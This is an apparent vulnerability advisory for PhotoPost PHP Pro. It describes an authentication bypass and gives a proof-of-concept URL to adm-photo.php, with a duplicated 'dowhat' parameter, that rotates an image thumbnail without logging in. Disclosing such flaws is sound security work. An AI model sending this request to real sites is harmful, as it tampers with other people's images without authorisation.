All Enthusiast PhotoPost PHP Pro Multiple Remote Vulnerabilities

info
discussion
exploit
solution
references

All Enthusiast PhotoPost PHP Pro Multiple Remote Vulnerabilities

No exploit is required to leferage either of these issues. The following proof of concept is designed to leverage the authentication bypass issue allowing for image manipulation.

To rotate the specified image thumbnail clockwise:
http://www.example.com/photopost/adm-photo.php?ppaction=manipulate&pid=[IMAGE ID]&dowhat=rebuildthumb&dowhat=rotateccw